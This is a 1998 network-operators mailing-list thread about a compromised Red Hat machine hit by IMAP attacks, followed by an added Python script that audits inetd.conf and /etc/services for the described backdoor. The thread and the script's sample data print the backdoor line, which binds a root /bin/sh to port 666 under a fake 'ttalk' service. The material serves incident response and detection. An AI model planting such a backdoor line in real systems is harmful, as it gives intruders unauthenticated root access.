North American Network Operators Group
Re: IMAP attacks continue
Btw. The best you can do is to install an access filter on the router and log any attempts to connect to this port in your network; and if you see such an attempt you should write a 'Hacker in your system (suspicion)' warning to the network admin where this connection originated from. 70% of these cases should be 'broken systems'.

On Mon, 23 Nov 1998, Phil Howard wrote:

> Date: Mon, 23 Nov 1998 09:35:17 -0600 (CST)
> From: Phil Howard <[email protected]>
> To: [email protected]
> Subject: Re: IMAP attacks continue
>
> An addendum to:
>
> > I found a machine that had Red Hat 5.1 unmodified running on it, and it
> > got hit. So I closed things off and looked around for damage and found
> > the following:
> >
> > 1. Syslogd had been killed off and the syslog file deleted.
> >
> > 2. A backdoor was installed in /etc/inetd.conf as follows:
> >
> > ttalk stream tcp nowait root /bin/sh sh -i
>
> I checked the port assignments from IANA and there is no such thing as
> "ttalk". I found this line in /etc/services:
>
> ttalk 666/tcp
>
> so it appears to be hijacking the port used by (as seen in the file
> ftp://ftp.iana.org/in-notes/iana/assignments/port-numbers):
>
> mdqs 666/tcp
> mdqs 666/udp
> doom 666/tcp doom Id Software
> doom 666/udp doom Id Software
>
> So also check /etc/services on any potentially compromised machines.
>
> --
> -- *-----------------------------* Phil Howard KA9WGN * --
> -- | Inturnet, Inc. | Director of Internet Services | --
> -- | Business Internet Solutions | eng at intur.net | --
> -- *-----------------------------* philh at intur.net * --
>

Aleksei Roudnev, Network Operations Center, Relcom, Moscow
(+7 095) 194-19-95 (Network Operations Center Hot Line), (+7 095) 239-10-10, N 13729 (pager)
(+7 095) 196-72-12 (Support), (+7 095) 194-33-28 (Fax)
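An added example, not part of the thread, that automates the two checks Phil describes: it flags inetd.conf entries that hand a port directly to a shell (resolving the port through /etc/services, as inetd does) and /etc/services names that sit on a port IANA registers under a different name. The sample file contents and the small IANA baseline are constructed for the example.

```python
# Constructed sample files modelled on the backdoor described in the thread.
INETD_CONF = """\
ftp     stream  tcp  nowait  root  /usr/sbin/tcpd  in.ftpd -l -a
imap    stream  tcp  nowait  root  /usr/sbin/tcpd  imapd
ttalk   stream  tcp  nowait  root  /bin/sh         sh -i
"""
SERVICES = """\
ftp     21/tcp
imap    143/tcp   imap2
mdqs    666/tcp
ttalk   666/tcp
"""
# Assumed baseline: a tiny excerpt in the spirit of the IANA port-numbers file.
IANA_BASELINE = {"21/tcp": {"ftp"}, "143/tcp": {"imap", "imap2"},
                 "666/tcp": {"mdqs", "doom"}, "666/udp": {"mdqs", "doom"}}
SHELLS = {"sh", "bash", "csh", "ksh", "tcsh", "zsh"}

def parse(text):
    """Yield the whitespace-split fields of each non-comment, non-empty line."""
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if line:
            yield line.split()

def port_of(name, services):
    """Resolve a service name (or alias) to its port/proto via /etc/services."""
    for f in parse(services):
        if len(f) >= 2 and (f[0] == name or name in f[2:]):
            return f[1]
    return None

def audit_inetd(conf, services):
    """Flag inetd entries whose server program is a shell, with the port they bind."""
    findings = []
    for f in parse(conf):
        # fields: service socket proto wait/nowait user server-program args...
        if len(f) >= 6 and f[5].rsplit("/", 1)[-1] in SHELLS:
            port = port_of(f[0], services) or "unknown port"
            findings.append(f"{f[0]} ({port}): {f[5]} {' '.join(f[6:])} as {f[4]}")
    return findings

def audit_services(services, baseline=IANA_BASELINE):
    """Flag /etc/services names that squat on a port registered to another name."""
    findings = []
    for f in parse(services):
        if len(f) >= 2 and f[1] in baseline and f[0] not in baseline[f[1]]:
            findings.append(f"{f[0]} on {f[1]}: IANA lists {', '.join(sorted(baseline[f[1]]))}")
    return findings

if __name__ == "__main__":
    for line in audit_inetd(INETD_CONF, SERVICES) + audit_services(SERVICES):
        print("SUSPICIOUS:", line)
```

On a real host, feed it the contents of /etc/inetd.conf and /etc/services and a fuller baseline; a shell as the server program is suspicious regardless of the port name it hides behind.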